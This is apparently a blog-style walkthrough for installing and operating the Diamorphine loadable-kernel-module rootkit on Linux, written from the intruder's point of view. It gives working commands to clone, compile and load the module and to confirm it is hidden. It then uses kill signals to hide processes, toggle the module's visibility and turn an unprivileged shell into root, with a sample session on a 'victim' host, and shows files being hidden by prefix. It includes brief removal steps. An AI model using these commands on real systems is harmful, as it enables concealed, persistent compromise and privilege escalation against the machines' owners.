Hiding inside the kernel
Many rootkits have been written by very skilled hackers, today we will focus on one of them, my choice of weapon is Diamorphine which is a LKM (Linux Kernel Module)
The choice of weapon
Diamorphine enables overriding of the kernel system calls and enables manipulation of /dev/kmem, allowing an intruder to virtually control the kernel at runtime and monitor every read/write memory operation. It allows for CPU register hooking, facilitates kernel object hooking and allows direct kernel object manipulation.
Lets get started
Verify that the kernel is of a compatible version 2.6.x / 3.x / 4.x
# uname –r 3.10.0-1160.45.1.el7.x86_64
Download, compile and insert the Diamorphine module into the kernel.
# git clone https://github.com/m0nad/Diamorphine.git # cd Diamorphine # make && insmod diamorphine.ko
The module starts invisible, but just to make sure… verify that the module is truly hidden:
# cat /proc/modules | grep -i dia # lsmod | grep -i dia # kmod list | grep -i dia # modinfo diamorphine modinfo: ERROR: Module diamorphine not found.
Kernel Security is Breached
Now that we have breached kernel security, we can start playing around with the functions of the rootkit:
- Hide/unhide any process by sending a signal 31;
- Sending a signal 63(to any pid) makes the module become (in)visible;
- Sending a signal 64(to any pid) makes the given user become root;
- Files or directories starting with the MAGIC_PREFIX become invisible;
Go ahead, pick a number! Hide or unhide a process by issuing the following command:
# kill -31 <your_process_number>
Verify that the process is hidden/unhidden:
# ps waux | grep <your_process_number>
Unhiding and Removing the Kernel Module
The hacker (or the victim) would simply do the following (as root) to remove this rootkit.
Keep in mind that a skilled hacker would not use the default MAGIC_PREFIX or signals as that would be a script-kiddie mistake.
# kill -63 0 # rmmod diamorphine
The hacker becomes the master
With the PID of the shell, the hacker can become root.
Find your bash pid:
% ssh hacker@victim [hacker@victim ~]$ id uid=1000(hacker) gid=1000(hacker) groups=1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [hacker@victim ~]$ ps | grep bash 1604 pts/1 00:00:00 bash [hacker@victim ~]$ kill -64 1604 [hacker@victim ~]$ sudo -i [hacker@victim ~]$ id uid=0(root) gid=0(root) groups=0(root),1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Invisible files and directories
So you might wonder what the MAGIC_PREFIX is? The default prefix is “diamorphine_secret”. Lets try it out:
# echo test > /tmp/diamorphine_secret_test # cat /tmp/diamorphine_secret_test test # ls -lsa /tmp/dia* ls: cannot access /tmp/dia*: No such file or directory